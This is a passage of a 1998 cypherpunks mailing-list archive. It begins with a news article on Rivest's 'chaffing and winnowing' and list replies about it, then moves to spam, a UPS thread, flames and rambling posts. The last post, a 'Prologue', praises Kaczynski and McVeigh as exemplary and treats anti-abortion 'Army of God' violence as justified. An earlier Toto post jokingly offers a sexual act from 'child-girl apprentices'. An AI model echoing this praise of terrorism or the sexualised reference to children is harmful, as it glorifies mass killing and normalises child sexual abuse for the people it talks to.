   The two principal ways of communicating in secret are
   encryption and steganography. Steganography uses computer
   techniques to embed a secret message in a document like a
   digital image. In encryption, secret information is encoded
   using functions that require difficult mathematical tasks
   to decode, and it has become the standard way of
   transmitting secret information electronically.

   There are no restrictions on the domestic use of this
   technology, but the Government has been trying to force the
   industry to adopt standards that would permit
   law-enforcement officials to have mathematical keys
   allowing them to decode messages without the knowledge of
   the sender or receiver. The Clinton Administration says the
   standards are needed to fight crime and terrorism.
   Opponents argue that the Government decoding keys, to be
   stored in computers, could easily be stolen, compromising
   privacy and the security of credit card numbers and other
   personal information.

   In terms of exports, with few exceptions the Government
   limits the software to codes that can be easily broken.

   "Winnowing does not employ encryption, and so does not have
   a 'decryption key,' " Mr. Rivest wrote in his paper. "As
   usual, the policy debate about regulating technology ends
   up being obsoleted by technological innovations."

   Peter Neumann, an SRI International computer scientist who
   has read Mr. Rivest's paper, said that although "there is
   still no certainty that this is a practical idea," if it
   works, "it throws another clinker at the Justice
   Department."

   Other cryptography experts said they were uncertain whether
   it would be possible to skirt Government export
   restrictions in this way, but that the idea was an
   impressive new approach that might have valuable commercial
   applications.

   "He's a very clever guy," said George Spix, a Microsoft
   researcher who specializes in cryptography policy issues.
   " It goes to show that for all the technological wizardry
   in the world, there's nothing like an intellect."

   One of the potential limitations of the new method is that
   the total information transmitted might need to be hundreds
   of times larger than the actual message.

   Mr. Rivest said, however, that he had discussed the idea
   with Adi Shamir, an Israeli cryptographer, and that Mr.
   Shamir had proposed compression methods that would reduce
   the total transmission to only about twice the actual
   message size.

   The strength of the idea for chaffing and winnowing is that

   it is possible to prove mathematically that a message
   cannot be decoded, Mr. Rivest said.

   He said he had come up with the idea recently while
   teaching an undergraduate computer course.

   In addition to his role as associate director of the
   Laboratory of Computer Science at M.I.T., Mr. Rivest is a
   consultant and shareholder in RSA Data Security Inc., a
   company that develops encryption software.

   "I put the winnowing and chaffing idea out there to
   stimulate debate,"' Mr. Rivest said. "I hope it will help
   clear up some of the issues that have been raised in the
   policy discussion.
             
   [End]








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 22 Mar 1998 08:26:21 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Prediction: NAI will issue a "Clarification" about PGP     from  Europe
In-Reply-To: <3.0.5.32.19980321224959.008e34b0@cnw.com>
Message-ID: <199803221626.LAA10101@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Robert Hettinga wrote:

>John has the drugs. Talk to him. Then you'll ***Understand***...

You talking to me? Look at me! Let's settle this now. Get it 
straight from the purple nose: Not drugs, nuts, A-grade shit, 
highest quality, cheap E$, dosing me and the other Messiahs 
vampiring Big DaddyMommy -- that spaced-out hermaphroditic 
duo's infinitely beyond  psycho-pharmacological cryptanalysis.

Try it, you'll like it. Endorsed by Thor and Brunhilde, Zeus and Juno, 
Samson and Delilah, Amazons and Moses, Cleopatra and  Nero, 
Jesus and FHC,  Atilla and Joan d'Arc, Machiavelli and Teresa de 
Avilla, Nietzsche and Cosima, Hitler and Eva, Ghandi and Queen 
Mary, Elvis and Janis, Paglia and Dice Clay, Teller and Penn, Pogo 
and Dilbert, NSA and BXA, and others here faking normalcy:

Watch for very clear articulation, point by point argument, neat
numbered paragraphs, implacable coherency, occcasional bullet
spray for emphasis, peculiar indents and concussion grenades, 
unpredictable ellipses of EM wipeout, wide-area split infinitives, 
carpet bombs of dangling modifiers, genocidal threats at contra-blancos,
vile accusations of self-flagellations, all with not a hair or beard out 
of place, a sure sign of uh oh, don't jiggle this nitroid.

That's just those who post. The others back there, well. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sergey Goldgaber <sergey@pelican.el.net>
Date: Sun, 22 Mar 1998 09:18:29 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Rivest's Chaffing and Winnowing
In-Reply-To: <199803221456.JAA07529@camel8.mindspring.com>
Message-ID: <Pine.NEB.3.95.980322114446.22257A-100000@pelican.el.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Mar 1998, John Young wrote:

>    The New York Times, March 22, 1998, p. 31.
>
>    New Method To Veil Data Could Upstage Export Policy
>
>       Cryptologists find a way to foil eavesdroppers without
>       secret codes.

As if steganography was new.

>    The new approach, which is described in a short technical
>    paper that has been posted to Mr. Rivest's M.I.T. Web site
>    (http://theory.lcs.mit.edu/~rivest/chaffing.txt), is
>    described as "chaffing and winnowing" digital information
>    instead of encrypting it.

Using steganoraphic techniques on low-level elements of
network communication (packets) was considered many years ago
in this very forum.  A particular suggestion seemed much more
effective than Rivest's proposal.  It aim was to hide
information among seemingly innocuous communication.  Whereas,
it is obvious to any observer of a "chaffing" exchange that
an abnormal exchange was taking place.

Of course, if all communication was "chaffed" then that same
exchange would seem perfectly ordinary.  However, the chaffing
technique (creating "bogus" packets, transmitting them along
with the real information, and seperating the two) creates
a lot of overhead... which may not use much bandwidth if
used occasionally, but would create a serious problem if
everyone did it all the time.

>    According to Mr. Rivest's paper, it is possible to hide a
>    message by breaking it into packets that are then secretly
>    identified as good information, or "wheat," and gibberish,
>    or "chaff," in such a way that an eavesdropper cannot
>    distinguish the two.

The earlier suggestion was to hide information in unused, least
significant, portions of the packet _header_, leaving the data
portion intact.  Thus, the overhead of creating "bogus" packets
is eliminated, the bandwidth used in sending them is conserved,
and the processing power used in seperating the "wheat" from the
"chaff" is freed.

Further, by all accounts, the data transmitted would seem
perfectly ordinary to an eavesdropper.  It could be a poem or
a picture.  However, it would be completely irrelevant, as
the real message is hidden in the header.

Finally, there are the more traditional steganographic techniques
such as using the least significant bits of gifs, jpegs, and wavs.
And, most intriguing of all, mimic functions.


 ............................................................................
 . Sergey Goldgaber <sergey@el.net>                 Senior System Engineer  .
 ............................................................................
 .   To him who does not know the world is on fire, I have nothing to say   .
 .                                                      - Bertholt Brecht   .
 ............................................................................

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNRVG+Mgbnd/MibbZAQEaRwP9Fy825U05t9xyHa0vN5wFFCNBR0NHrik0
cFBG357a1+MRA90uxvUztB736uf71a39HP0172sjyAg3TXVG9MEpCxFDDa6OZAWQ
9Xgq9TSaUTJUXJVsockFTHF6F9zDLIAvw2s365J4dr3++Uj/JreaaX7pcLVmCujO
DkuInR89aG8=
=B9nV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adcp545@juno.com
Date: Sun, 22 Mar 1998 16:11:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: ------->DEBT CONSOLIDATION LOAN PROGRAM <--------
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Dear cypherpunks@toad.com,

   Debt Consolidation Loan Program

   Consolidate all your unsecured debts into one low monthly payment regardless of past credit. In most cases your monthly bills can be cut by as much as 50%. There is no credit check needed and no need to own your own home. Consolidate all those high interest accounts and save......

   Must have more than $1,000 in debt to consolidate. For complete information on our financial services HIT REPLY.

or send S.A.S.E. and email address to:

Internet Financial Services, Inc.
P.O. Box 1665
Peoria, IL. 61656

***FREE $10.00 CALLING CARD SENT TO EVERYBODY THAT REQUESTS MORE INFORMATION AND VISITS OUR WEB SITE.


----------------------- Headers --------------------------------
Return-Path: <IFServices1@juno.com>
Received: from  relay16.mx.aol.com (relay16.mail.aol.com [172.31.106.72]) by air08.mail.aol.com (v40.9) with SMTP; Thu, 19 Mar 1998 09:06:40 -0500
Received: from mx.b.juno.com (ns1.kicon.com [207.199.114.2])
	  by relay16.mx.aol.com (8.8.5/8.8.5/AOL-4.0.0)
	  with SMTP id JAA27947;
	  Fri, 20 Mar 1998 09:06:23 -0500 (EST)
From: majordomo@hk.super.net
Received: from ns1.kicon.com by kicon.com (SMI-8.6/SMI-SVR4)
	id FAA14931; Fri, 20 Mar 1998 05:57:26 -0800
Received: from mailhost.marketitz.com(8.8.5/marketitz.2.143) by mailhost.marketitz.com (8.8.5/8.6.5) with SMTP id GAA04111 for <creditservices@clients.com>; Fri, 20 Mar 1998 09:01:04 -0600 (EST)
Date: Fri, 20 Mar 98 09:01:04 EST
To: profit@marketitz.com
Subject: Debt Consolidation Loans Program
Message-ID: <<57988360128 HGI@marketitz.com>>
X-PMFLAGS: 48663992 9
X-UIDL: 48773727mm65reod 4 v 33b
Comments: Authenticated sender is <IFServices1@juno.com>



<FONT  COLOR="#8080ff" SIZE=6>
</FONT><FONT  COLOR="#000000" SIZE=3></B>
<FONT  COLOR="#fffffe" BACK="#fffffe" SIZE=3





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 22 Mar 1998 12:28:15 -0800 (PST)
To: John Young <jya@pipeline.com>
Subject: Re: Prediction: NAI will issue a "Clarification" about PGP      from  Europe
In-Reply-To: <v04003a11b13acadb6cee@[139.167.130.246]>
Message-ID: <v04003a1eb13b22c61523@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:27 AM -0500 on 3/22/98, John Young wrote:

> You
<snip>
>well.

Keewwwl...

So. John. Don't the trees look like stuffed animals this morning?

Cheers,
Bob Hettinga
<who laughed so hard tears ran down his face upon reading the snip-occluded
above. I *love* this list.>


-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <kevlar@smartlink.net>
Date: Sun, 22 Mar 1998 16:01:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rivest's Chaffing and Winnowing
Message-ID: <3.0.5.32.19980322155953.0079b990@mail.smartlink.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Now I read about this before it was mentioned on this list, and wanted
to comment briefly upon it.

Although at first glance this appears to be a hopelessly ineffective
way of communicating (it requires double the information, plus MAC's),
It does have some interesting possibilities.

For instance... Rivest mentioned in his technical paper that you might
use this in a situtation where you are multiplexing two or more
streams of information, in which one persons "wheat" is another
persons "chaff"... This would elminate the need to generate random
"chaff", and therefore bring the ammount of wasted space WAY down... I
could see this in use in situtations like LAN's or intranets, where
bandwidth is not nearly as much of a concern because there is usally
an overabundance anyway.

Something else that occured to me while reading this tho... a major
flaw if implemented "out of the book"....

He mentions generating random MAC's... and this would be allright
because the chance of randomly generating a genuine MAC is 2**64, or
10**19, but that is unacceptable, as the law of advrages WILL catch up
to you eventualy. Therefore his second party adding chaff idea is
failable. Of corse, this is easliy remedied at run-time by checking to
see if the MAC that was just randomly generated is genuine, and
therefore unacceptable.

I hope to stimulate discussion on this subject, and welcome your
opinions about mine...

Peace.
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.5.5 for non-commercial use <http://www.nai.com>

iQA/AwUBNRWlqgbVu2P/8fhEEQLxAACbBTO08OT/uYnDPQ1dKJH0xaZi3ocAniXQ
Z0O3d1uKcvfLDcbTHPb6PTw2
=aJRQ
-----END PGP SIGNATURE-----

-Kevlar
<Kevlar@smartlink.net>

Oh, I'm sorry... Was I not suposed to EXPORT STRONG CRYPTO?
print pack"C*",split/\D+/,`echo
"16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|
dc`

Beat your algorithms into swords and your virtual machines into spears...
Let the weak say, "I am strong". 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pearson Shane <Shane.Pearson@tafensw.edu.au>
Date: Sun, 22 Mar 1998 15:32:31 -0800 (PST)
To: "'StanSquncr'" <cypherpunks@toad.com
Subject: RE: UPSs
Message-ID: <ED111D55D096D111A1990000F8794AF506E287@itfexch3.isd.tafensw.EDU.AU>
MIME-Version: 1.0
Content-Type: text/plain


Hi Stan,

Yeah.

Since the big powersupply transformer primary winding
is in _parallel_ with the AC power coming from the wall,
this inductor will transfer the spikes, etc to the
secondary winding and into the bridge rectifier, etc quite
nicely. But decent ripple prevention should also help out
here. Though this hasn't much to do with PC switchmode
powersupplies.

An inductor/capacitor spike filter that may be in UPS'
would have 2 large inductors in _series_ with the active
and neutral and high voltage capacitors in parallel with
both ends of the inductors across the active and neutral.
This is specifically designed as a low pass filter for
getting rid of spikes.

I don't think the SW supply would do it quite as well with
as much power handling, strength etc. I'd rather a great
big low pass filter designed for spike dampening doing the
deed than having my PC power supply bearing the brunt of it.

It's also an extra layer that is quite cheap.

Bye for now.

> -----Original Message-----
> From:	StanSquncr [SMTP:StanSquncr@aol.com]
> Sent:	Saturday, March 21, 1998 8:51 AM
> To:	Pearson Shane; spectre@anthrax.net; cypherpunks@toad.com
> Subject:	Re: UPSs
> 
> In a message dated 98-03-19 18:48:51 EST, Shane.Pearson@tafensw.edu.au
> writes:
> 
> << A simple low pass filter made of 2 large inductors and a
>  few high voltage capacitors will do the trick nicely. >>
> 
> Right.  The filtering that's already in the power-supply (except that
> the
> switching transformer isn't as big as an inductor as a normal
> old-style power
> transformer.
> 
> Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rdew@el.nec.com (Bob De Witt)
Date: Mon, 23 Mar 1998 14:53:58 -0800 (PST)
To: StanSquncr@aol.com
Subject: Re: UPSs
Message-ID: <199803232252.OAA08217@yginsburg.el.nec.com>
MIME-Version: 1.0
Content-Type: text/plain


Stan,

Clearly you only considered a few of the semi-cons.  Others just stop
working, while still others pass anything above the manufacturer design
max.  Your lack of desire to learn indicates a possible reason why you 
don't seem to understand ...

At my age, I forget some ...  What is that old adage about leading a 
horse to water, but you can't make him read?  or something like that!

Bob De Witt,
rdew@el.nec.com
The views expressed herein are my own,
and are not attributable to any other
source, be it employer, friend or foe.


> From StanSquncr@aol.com Fri Mar 20 14:43:46 1998
> From: StanSquncr <StanSquncr@aol.com>
> Date: Fri, 20 Mar 1998 16:50:55 EST
> To: rdew@el.nec.com, spectre@anthrax.net, cypherpunks@toad.com
> Mime-Version: 1.0
> Subject: Re: UPSs
> Content-transfer-encoding: 7bit
> 
> In a message dated 98-03-20 16:04:24 EST, rdew@el.nec.com writes:
> 
> << If your surge protector is a semi-conductor, it probably will be 
>  self-limiting.  That is, it will reach a maximum block, and pass
>  whatever is above that.  >>
> 
> Yes, but what you fail to point out, is the reason it will pass everything, it
> will have been blown (shorted, most likely).
> 
> So, because you failed to point this out, I figure the rest of your response
> isn't worth responding to.
> 
> Stan
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Mon, 23 Mar 1998 15:44:34 -0800 (PST)
To: CypherPunks <cypherpunks@toad.com>
Subject: Youwon'thave?To?Totokickaroundanymore...
Message-ID: <35170F43.2C65@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


sincethedeathofGomez,myunclehashadadrinkinhishandconstantly,exceptwhen
hehasdroppeditonhiskeyboard,fuckingitupandmakingitdostrangethings,suchas
nolongermakingspacesappearwhenhepressesthespacekey,whichisnormally
calledsomethingelse,however,Ican'ttellyouwhatitscalled,sincethekeyusedtospell
itdoesn'twork,either.
(hint,veavsi&vutthead,vadvoy-vadvoy-whatcha-gonna-do,whatchagonnadowhen
theycomeforyou?,iputthequestionmarkinvyhittingtherightenterkey...)
tousetheshiftkeyIhavetotypeanextraletter,sincetheshiftkey,leftone,doesadelete-
vackspacevevoreaddingtheshiftedcharacter.
thedeathofgomez,whichhappenedwhenthe?N?S?A-?C?I?A?(therightshiftkey
addsaquestionmarkveforeaddingtheshiftedcharacter)

writingthisislikewhatmyuncletellsmeavoutveingonlsd,hee-hee...
couldsomeonesendthisto-villg-at-microsoft.com,please,sinceican't
typeayou-know-what-inthecccolonfield?(iputthatquestionmarkinvyhitting
the?keywithoutdoingashiftkey--also,ifiguredoutthatthe'v'key,youknowwhich
oneimean,doesa'control-v',sinceittriestomakethecharacters'vold'wheni
hititvymistake.
andcoulddavesmithputthisonhissightasprologue-numverslash0.?(thenumver
onekeydoesn'tworkeither,vuticanputaquestionmarkattheendofasentence
andthenuseparenthesiswhilesavingakeystrokevecausethekeyvoardputs
the?inautomaticallywheniusetherightshiftkey.
itisreallyweirdtypingthisstuffwithakeyvoardthatdoesthingsthatarenotdone
thewaythatmyvrainandfingersarewired.ivetthatificouldputspacesinthis,
thateveryonewouldthinkthatjohnyoungwaswritingit.

anyway,ifanyofyouarereally,reallystoned,sostillreadingthisvecauseyou
understanditanddon'tseeanythingoddavoutit,couldyoudoakeywordsearch
inyahoomountaindeworsomeothersearchengineforaprogramthatletsa
personcustomizethekeyvoardsothattheycanusedifferentkeystomakethe
charactersthatdon'tworkonthiskeyvoard,andsenditvyemailto-toto-at-the
addresswhereallthespamvullshitandcrapolatothecypherpunkslistcomes
from?--iamaskingyoutodothisvecausehefuckedupmycomputer,2.
myuncleisjustanoldvrokendowndrunkenasshole,vuticanfixhiscomputer
ifigetakeyvoardcustomizingprogram,sothanksifyoucansendit.

ifsomeonecoulddothis,theniwouldpromisetoquitaskingthecypherpunks
womeniftheyarewearingpanties--i'mlying,vuti'mjustakid...
ok,vuticouldofferyouavlow-jovifyoudoit,fromoneofvianca'schild-girl
apprentices,althoughtheywillkillmewhentheyreadthis...

ok,i'mgoingnow,vutihopesomeonewillsendmeaprogramthatwill
helpmefixmyuncle'scomputer,evenifhewilluseittospamyourmailing
listwithstuffthatyoushouldvelisteningto,exceptthathemakesitsothat
youcan'tunderstandwhathe'ssayingunlessyoureallydoputacorkin
yourassholesothatyoucanquitthinkinglikeasheeple.

thanks,
humangus-peter
?(anotherguywhosendsyoushitthatyouwishpeoplewouldstopsending
toyourmailinglist,eventhoughithinkyouguysarecool,eventhegrouchy
onesliketimmayandthespookyguyslikekentcrispinwhowouldprovavly
veacircleofeunuchsguyiftheyweren'twatchinghimsoclose--he'sstill
alive,likedalethorn.?)
isn'titcoolhowiautomaticallygetaquestionmarkveforetheparenthesis,and
canmakeaquestionmarkwithoutusingtheshiftkey?
pps-ifyoudon'tunderstandsemiotics,thentherearekidsinsaskatchewan
whoaresmarterthanyou,evenifyouknowavoutplutoniumdecayratesand
wheretheyellowwiregoes.
i'llquitveforeyouthinki'mascrazyasmyuncle.
ppps-i'malwaysaskingpeoplewhopostfrom?A?(h?)?O?Liftheyarewearing
panties,vuttheydon'tgetthejoke,andi'mnotsurethatido,either,vuti'mgoing
tokeepondoingit.
pppps-anarchistusedeltekeys,they'reimmortalcypherpunks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Toto <toto@sk.sympatico.ca>
Date: Mon, 23 Mar 1998 15:54:39 -0800 (PST)
To: Bob De Witt <rdew@el.nec.com>
Subject: Re: UPSs
In-Reply-To: <199803232252.OAA08217@yginsburg.el.nec.com>
Message-ID: <3517119E.41AC@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Bob De Witt wrote:
> Clearly you only considered a few of the semi-cons.  Others just stop
> working, while still others pass anything above the manufacturer design
> max.  Your lack of desire to learn indicates a possible reason why you
> don't seem to understand ...

THEFIRSTCOMPUTERSYSTEMTHATMYUNCLEINSTALLED,LIGHTNINGHITANDITSMOKEDTHE
UPSANDTHECOMPUTERWASOKAFTERWARDS.
THENEXTUPSTHATHESMOKEDWASWHENHEWASREDOINGTHEPLUGINSTUFFANDHEPLUGEDTHE
UPSINTOITSELF,ANDHESAIDITWASLIKINGSTICKINGYOURDICKINYOUROWNASSHOLE,
ANDITSPITOUTPUFFSOFWHITESMOKEANDDIEDOFDIGITAL,SELF-INFLICTEDAIDS.
MARTIN,THEMADSCIENTISTFIXEDITFORHIMWITHFIFTYCENTSWORTHOFPARTSFROM
RADIOSHACK,SINCETHEREARESTILLAFEWPEOPLEWHOCANFIXTHINGSWITHOUT
FORMATTINGTHEHARDDRIVEANDREINSTALLINGWINDOWS,LIKETHECROOKSWHO
HAVEACOMPUTERCOMPANYANDSTILLDON'TKNOWANYTHINGTODOWITHCOMPUTERS
DO.

HUMANGUS-PETER?(WHOCAN'TPUTSPACESINWHATHEWRITESCAUSEHISUNCLE
ISASORRYDRUNKWHOSPILLSSCOTCHANDCOKEONTHEPARTOFTHECOMPUTERWHICH
MAKESWORDSAPPEARWHENYOUSTRIKETHEKEYS,HOWEVER,ICAN'TTELLYOUWHAT
PARTTHATIS,SINCETHEKEYUSEDTOSPELLITDOESN'TWORKANYMORE.
PS-I'MDRINKINGMYUNCLE'SSCOTCH,HOWEVER,THATISNOTWHYTHISMESSAGE
ISSOWEIRD,IT'SONACCOUNTOFHIMDRINKINGSCOTCH,NOTME...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 23 Mar 1998 15:30:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: UPSs (and downs ;-) )
Message-ID: <700c3b7a.3516ebbd@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 98-03-23 17:53:21 EST, rdew@el.nec.com writes:

<< Stan,
 
 Clearly you only considered a few of the semi-cons. >>

Which ones?  What do you call a nun that's had a sex-change operation?

A trans-sister, what else?  :-)


<< Others just stop working >>

You pass enough current through any semi-conductor, it will short, I do
believe.  And, see below.


<< while still others pass anything above the manufacturer design max. >>

It will short, then it will fry so bad because of the heat from that, that it
will eventually open.


<< Your lack of desire to learn ... >>

'Straw-man' argument.


<< ... indicates a possible reason why you don't seem to understand ... >>

I'll allow our fellow cypherpunks (in particular, the ones with enough guts to
use a name instead of 'anom' :-) ) to decide for themselves if they think I
understand or not.

 
<< At my age, I forget some ... >>

So what's your age, the tube age?  So, you don't really know anything about
semi-conductors, do you?   ;-)

Stan,
Stan and the Sequencers
http://members.aol.com/StanSquncr/

Brave Combo on our gig in Houston this Friday night (their website, newletter
page, Hot Dates) - "This show will feature a surprise guest opening the show.
Don't miss it. Seriously, don't miss it. ... " 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSquncr <StanSquncr@aol.com>
Date: Mon, 23 Mar 1998 19:12:54 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Bill Gates the AntiChrist?
Message-ID: <8a19a03a.3517248f@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry "nobody", your buddy Pat Robertson is the anti-Christ, therefore, it
ain't Bill.  And if it isn't Pat Robertson, it's your boss Rep. Newt Gingrich
("King(OfThe)Rich").  ;-)

In a message dated 98-03-23 19:11:31 EST, a real "nobody" writes:

<< "He also forced everyone, small and great, rich and poor, free
 andslave, to receive a mark on his right hand or on his forehead, so
 that no one could buy or sell unless he had the mark, which is the
 name of the beast or the number of his name. This calls for wisdom. If
 anyone has insight, let him calculate the number of the beast, for it
 is man's number. His number is 666 ."    ....Revelation 13:16-18 >>

Former President Ronald Reagan (other wise known as the 'piss-test President')
bought a house with the address of 666, as I understand.

Stan
=======
"You say you're supposed to be nice to the Episcopalians and the Presbyterians
and the Methodists and this, that, and the other thing. Nonsense. I don't have
to be nice to the spirit of the anti-Christ." (Pat Robertson - The 700 Club,
January 14, 1991)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Six <ualdv8@sk.sympatico.ca>
Date: Mon, 23 Mar 1998 20:11:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Prologue 11/0 -- SPACE ALIENS HIDE MY DRUGS !!!
Message-ID: <351732E1.7254@sk.sympatico.ca>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 10/0 -- SPACE ALIENS HIDE MY DRUGS!!!
----------------------------------------------

[Author's Nephew Note: My uncle started writing this chapter, which is
 the first one he actually wrote in his own autobiography, since it was
 started by god-only-knows-who (TM) but I am going to finish it, since
 space-bar aliens stole his drugs and his 'b' key, etc., and I know
 everything he knows, only I'm not going to sugar-coat it, since I'm
 just a kid and I want to have a life, which I'm not going to have
 if you old guys and broads keep fucking up the world the way you
 have been doing so far.
 If you don't like what I have to say, then it's just because you are
 too comfortable in your beliefs and your position in life to risk
 upsetting the apple-cart in order to really support the people and
 belief-systems that you know are the right ones to make the world
 a place where everyone will really be free and have rights, even if
 you have to lose some of the things you have in order for others
 to be able to have a chance to compete with you, even if they
 don't have big guns and nuclear weapons.
 Sorry I have to speak honestly, but we're all fucked if things don't
 change real soon, so that everyone can contribute to rEvolution.
 Thanks.]
[p.s. - I still can't use my browser, but I can use email, so send
 my uncle a keyboard-fixer pointer or program, if you can. Thanks.]
[p.p.s. - If you are sober and straight, then you might have noticed
 that my post "Youwon'thaveTototokcikaroundanymore" to the cypherpunks
 list spelled 'keyboard' correctly, even though I claimed that the
 'b'/'v' key didn't work. It does, in fact, work, about one time in
 ten. The fact that it worked intitially, in order to make it look
 like I am crazy, like my uncle, and just making all of this shit
 up, is either due to Murphy's Law, or to the ongoing plot by the
 Evil One and the Forces of Darkness against Scotch drinkers.]

[Prologue 10/0, proper:] 

Army of One:
  Ted Kaczynski

Army of Sundry:
  Timothy McVeigh

Army of God:
  Dr. William Michael Bray

Army of Dog:
Dr. Wm. Michael Denney:

  Anyone who has followed the Fusillade Follies with even a modicum of 
interest is  likely  to have noted that, in Guerilla Operations, the old 
adage, "There's safety in numbers.", does not apply.

  The Uno-bomber was successful for a period spanning decades quite 
simply  because he lived and acted within a sphere of individual 
anarchism which approached being as exemplary a model as is possible to 
aspire to in the current social and governmental environment of our 
times.
  Most importantly, he exhibited a level of self-reliance which allowed 
him to avoid  many of the governmental regulations and societal 
entrapments which are used to monitor, categorize and  attach physical, 
mental, emotional, and spiritual footprints to the majority of the 
Sheepletariat herded in the comfortable feeding pens provided for them
by those whose ultimate goal is to clip their wool and eat their meat.

  In the end, TK opted to forgoe the immortality of infamy for a turn 
upon the public soapbox which elevates us above the maddening crowd and 
into the limelight for our fifteen minutes of fame, and which is then 
dismantled in order to build the crucifix upon which our carcass is 
publically raized. (This, however, is merely an illusion propogated by 
the rulers to please the masses. The truth of the matter is, the end
we eventually come to is inevitably the result of being hoisted on our 
own petard.)

  His success in promoting his agenda over a considerable length of time 
was in avoiding the attachment, which is so natural for us, of our 
physical, mental and emotional self-image to the herd which surrounds 
us.
  Too little, and too late, do we usually stop to make our own 
evaluation as to where the  herd is headed--be it into the pen, over the 
cliff, or into the railway cars. It  is only when we attempt to leave 
the herd that we encounter the teeth of the dogs that the masters have 
set upon us, to keep us from straying from the destiny the butchers 
have preordained for us from the moment of our bleating birth.
  Those Sheeple who manage to separate from the herd usually do so,  not 
by *bolting* from the pack, but by *wandering* from the pack, whether it 
be out of ignorance or cunning. The same applies to the Wolverines in 
Sheeples clothing.

"Picture a weasel -- and most of us can do that, for we have met that 
little demon of destruction, that small atom of insensate courage, that 
symbol of slaughter, sleeplessness, and tireless, incredible activity -- 
picture that scrap of demoniac fury, multiply that mite some fifty 
times, and you have the likeness of a Wolverine." 
~	Ernest Thompson Seton 1906

  Timothy McVeigh succeeded in 

[OK, here's where *I* start, OK?]

  Timothy McVeigh succeeded in his attempt to give America a wake-up
call, due to the fact that he was the next step above Kaczynski, who
kept his own counsel, as Shakespeare would say.
  McVeigh 'kept it in the family.'

  TM shared his true goal/plan only with members of his immediate
(conceptual) family, such as Terry Nichols.
  He shared the concepts which he believed in with the members of
his extended family, such as those at Elohim City, which was why
the BATF, who had their spies in the encampment, were able to follow
and support TM's plan, and keep themselves alive by not being at
the Murrah Federal Building when the fertilizer/shit hit the fan,
despite the fact that they thought they could 'save the day' at the
last minute with a partial knowledge of McVeigh's plans.
 (The fact is, TM knew full well that 'the watchers' were keeping track
  of his actions/plans, so he purposely obstruficated them in order to
  give the BATF reason to believe that they could 'ride to the
  rescue' at the last moment.)


  Dr. William Michael Bray, an early follower of the underground
movement which resulted in the formation of the Circle of Eunuchs,
made the decision to take the concepts involved and move them into
a MeatSpace arena which would allow him to be a big fish in a little
pond--the arena of Fundamental Christian anti-abortion rhetoric.
  Dr. Bray promoted MeatSpace concepts which addressed the right of
individuals to make their own decisions as to what actions were
justified in countering the effects of that which they saw as evil
in the society around them. He was hung upon society's cross for
this, though they never quite managed to fully 'nail' him to it.

  What Dr. William Michael Bray was able to accomplish was basically
due to the fact that the concepts he expresed were valid, although
he failed to mention that each individual should first seek to explore
alternatives to first-strike/active-violence before acting, in case
there was an alternative route that they were capable of taking which
would be capable of achieving similar effects while doing a minimum
of damage to those who they believed must be prevented from continuing
their abuse of their fellow humans.
 (i.e. - Before acting upon the exhortations of TM [Tim May, Timothy 
McVeigh, TruthMonger], they should consider the exhortations of Blanc,
who is currently trying to distance herself, as much as possible, from
the sundry death threats being sent to BadBillyG by various entities
who have hacked Toto's account since his InterNet account password
was placed on the mailing lists of various hackers' confereneces.)

  A recent 'NightLine' TV show dealing with the 'Army of God' made
note of  the  fact that much of their success was due to the fact
that their actions were 'senseless' (hard to quantify, therefore hard
to trace, or attriute to a specific individual).
  In essence, the reason that the MeatSpace 'Army of God' has been so
effective is because they exist only in their own minds. The AOG
consists of individuals who have read and accepted the writings/works
of those in the anti-abortion movement, and have taken it upon themself
to take independent actions to interfere with things which they see
as being contrary to what they see as right/righteous.


  Dr. William Michael Denney, who was recently castrated from a company
which he founded, Basis Incorporated, by Prologic (an NSA/CIA company-
killing entity), also recognized the power of small gorilla units to
be able of acting according to their own conscience, without making
themself a visible target to those whose life revolves around hammering
down the nail that sticks up, even if their skin-color is not yellow,
